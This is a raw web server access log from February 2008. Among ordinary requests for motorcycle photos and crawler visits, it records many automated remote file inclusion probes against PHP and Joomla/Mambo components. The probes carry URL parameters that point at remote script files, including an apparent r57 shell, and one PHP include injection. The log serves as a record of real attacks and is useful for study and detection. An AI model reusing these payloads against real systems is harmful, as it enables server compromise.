69.22.162.60 - - [08/Feb/2008:06:35:33 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
69.22.162.60 - - [08/Feb/2008:06:35:33 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:06:36:05 -0800] "GET /logs/access_071229.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:06:36:05 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:06:36:06 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 200 34386 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.236.107 - - [08/Feb/2008:06:36:20 -0800] "GET /logs//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://oharano.net/modules/mod_stat/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.236.107 - - [08/Feb/2008:06:36:21 -0800] "GET //components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://oharano.net/modules/mod_stat/e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:36:35 -0800] "GET /logs/access_080117.log/phpATM/login.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:06:36:48 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:06:36:48 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.131 - - [08/Feb/2008:06:36:48 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.geocities.com/bokepan_ya/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.77.184.236 - - [08/Feb/2008:06:36:51 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.gunslingerfirearms.com/store/squirrelcart/sc_data/agreements/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:06:37:17 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.89.250.64 - - [08/Feb/2008:06:37:23 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:30 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:30 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:31 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:31 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:33 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:33 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:34 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:34 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:36 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:36 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:37 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:37 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:39 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:39 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:40 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:40 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:42 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4371M.JPG HTTP/1.1" 200 98619 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:42 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:43 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:43 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:45 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:45 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:46 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:46 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:48 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:48 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:51 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4388M.JPG HTTP/1.1" 200 56735 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:54 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:54 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:56 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:57 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:59 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:37:59 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
194.72.9.25 - - [08/Feb/2008:06:38:01 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11;MEGAUPLOAD 1.0" "www.dmulk.com"
202.171.48.7 - - [08/Feb/2008:06:38:02 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.greytauctions.org/phpAdsNew/auctions.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:06:38:31 -0800] "GET /logs/access_071229.log//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:06:38:31 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
77.48.10.14 - - [08/Feb/2008:06:38:32 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 200 33690 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.186.92 - - [08/Feb/2008:06:39:28 -0800] "GET /config.php?/phpsecurityadmin/include/logout.php?PSA_PATH=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
207.58.186.92 - - [08/Feb/2008:06:39:29 -0800] "GET /logs/config.php?/phpsecurityadmin/include/logout.php?PSA_PATH=http://oldbonescrew.de/modules/vwar/convert/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
67.195.44.108 - - [08/Feb/2008:06:39:40 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.89 - - [08/Feb/2008:06:39:40 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.44.188.10 - - [08/Feb/2008:06:41:49 -0800] "GET /logs/access.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.188.10 - - [08/Feb/2008:06:41:49 -0800] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
99.246.137.62 - - [08/Feb/2008:06:42:37 -0800] "GET /logs/access_071230.log HTTP/1.1" 200 231687 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)" "www.dmulk.com"
68.77.71.177 - - [08/Feb/2008:06:45:15 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
68.77.71.177 - - [08/Feb/2008:06:45:18 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
68.77.71.177 - - [08/Feb/2008:06:45:23 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
68.77.71.177 - - [08/Feb/2008:06:45:27 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
68.77.71.177 - - [08/Feb/2008:06:45:30 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
68.77.71.177 - - [08/Feb/2008:06:45:34 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
68.77.71.177 - - [08/Feb/2008:06:45:37 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.dmulk.com"
218.204.41.166 - - [08/Feb/2008:06:47:32 -0800] "GET /logs/access_080108.log//editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.h4x0rtools.kit.net/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.204.41.166 - - [08/Feb/2008:06:47:33 -0800] "GET /logs//editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.h4x0rtools.kit.net/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.182 - - [08/Feb/2008:06:48:16 -0800] "GET /logs/access.log/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [08/Feb/2008:06:48:16 -0800] "GET /logs/index.php?option=com_rwcards&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.18.194.158 - - [08/Feb/2008:06:48:41 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.18.194.158 - - [08/Feb/2008:06:48:47 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.18.194.158 - - [08/Feb/2008:06:48:53 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:49:26 -0800] "GET /logs/access_071229.log/phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:49:27 -0800] "GET /phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:49:27 -0800] "GET /logs/phpATM/config.php?include_location=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:50:30 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.11 - - [08/Feb/2008:06:51:45 -0800] "GET /bikes/CreSTOC07/?S=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:52:06 -0800] "GET /logs/access_080108.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:52:06 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:52:07 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.144.55.219 - - [08/Feb/2008:06:53:21 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
